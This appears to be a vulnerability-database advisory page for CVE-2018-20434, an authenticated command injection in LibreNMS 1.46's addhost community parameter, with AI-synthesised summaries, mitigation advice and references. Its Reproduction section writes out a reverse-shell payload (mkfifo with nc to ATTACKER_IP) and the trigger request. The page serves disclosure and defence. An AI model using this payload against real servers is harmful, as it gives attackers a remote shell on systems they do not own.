CVE-2018-20434
Description
LibreNMS 1.46 has an authenticated remote code execution vulnerability via unsanitized community parameter in addhost.inc.php.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
LibreNMS 1.46 has an authenticated remote code execution vulnerability via unsanitized community parameter in addhost.inc.php.
Vulnerability
Overview
CVE-2018-20434 affects LibreNMS version 1.46, an open-source network monitoring system. The vulnerability is a command injection flaw that allows an authenticated attacker to execute arbitrary OS commands. Root cause lies in the html/pages/addhost.inc.php script, which accepts a $_POST['community'] parameter without proper sanitization when creating a new device. This unsanitized input is later passed to a popen() call in capture.inc.php, leading to remote code execution [1][2].
Exploitation
Scenario
The attack requires valid credentials to the LibreNMS web interface. An attacker first sends a crafted POST request to addhost.inc.php with a malicious command embedded in the community field. Subsequently, the attacker makes a request to /ajax_output.php?id=capture&format=text&type=snmpwalk&hostname=localhost, which triggers the capture.inc.php script. That script uses popen() to execute the unsanitized command, allowing the injected OS command to run on the server [1][2]. The public exploit code (published by researcher Askar) demonstrates this two-step process [2].
Impact
Successful exploitation gives the attacker the ability to execute arbitrary operating system commands with the privileges of the web server user (typically www-data). This can lead to full compromise of the LibreNMS server, including data exfiltration, lateral movement within the network, and potential control over monitored devices [1][3].
Mitigation
Status
The issue is patched in versions after LibreNMS 1.46. Administrators should upgrade to a supported release. For those unable to upgrade, ensure that the community parameter is properly sanitized or restrict access to the addhost functionality [3][4]. The vulnerability has been publicly disclosed, and a proof-of-concept exploit is available, so immediate patching is strongly recommended [1][2].
AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- ghsa-coords
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The `community` parameter from device creation is not sanitized before being interpolated into an OS command in `capture.inc.php`, allowing OS command injection."
Attack vector
An authenticated attacker first sends a POST request to `/addhost/` with a malicious `community` parameter containing shell metacharacters (e.g., `'$(command) #`) to create a new device [ref_id=1]. The attacker then requests `/ajax_output.php?id=capture&format=text&type=snmpwalk&hostname=localhost`, which causes `capture.inc.php` to execute an SNMP command that includes the unsanitized community string, resulting in arbitrary OS command execution [CWE-78] [ref_id=1]. The exploit requires valid session cookies and the ability to create a device in LibreNMS [ref_id=1].
Affected code
The vulnerable code path involves `html/pages/addhost.inc.php` (device creation) and `html/includes/output/capture.inc.php` (command execution). The `$_POST['community']` parameter passed during device creation is later used unsanitized in an OS command within `capture.inc.php`, which is invoked via `html/ajax_output.php` when `$_REQUEST['id']` equals `"capture"` [ref_id=1].
What the fix does
No patch is included in the bundle. The advisory does not specify a fix, but the remediation would require proper sanitization or escaping of the `community` parameter before it is interpolated into an OS command in `capture.inc.php`, and/or validating that the community string contains only safe characters [CWE-78]. Users should upgrade to a version of LibreNMS later than 1.46 if a fix has been released.
Preconditions
- authAttacker must have valid authenticated session cookies for LibreNMS
- inputAttacker must be able to create a new device (POST to /addhost/)
- inputThe community parameter must contain shell metacharacters (e.g., single quote, command substitution)
- configThe target LibreNMS instance must be version 1.46
Reproduction
1. Authenticate to LibreNMS and capture session cookies. 2. Send a POST request to `/addhost/` with `community` set to a payload such as `'$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f) #` and other required fields (hostname, snmp=on, snmpver=v2c, etc.) [ref_id=1]. 3. Send a GET request to `/ajax_output.php?id=capture&format=text&type=snmpwalk&hostname=localhost` using the same session cookies [ref_id=1]. 4. The command executes; a reverse shell connects back to the attacker's listener [ref_id=1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
8- github.com/advisories/GHSA-62q7-qj6g-gvr7ghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2018-20434ghsaADVISORY
- packetstormsecurity.com/files/153188/LibreNMS-addhost-Command-Injection.htmlmitrex_refsource_MISC
- packetstormsecurity.com/files/153448/LibreNMS-1.46-addhost-Remote-Code-Execution.htmlmitrex_refsource_MISC
- drive.google.com/file/d/1LcGmOY8x-TG-wnNr-cM_f854kxk0etva/viewghsax_refsource_MISCWEB
- gist.github.com/mhaskar/516df57aafd8c6e3a1d70765075d372dghsax_refsource_MISCWEB
- shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434ghsaWEB
- shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434/mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.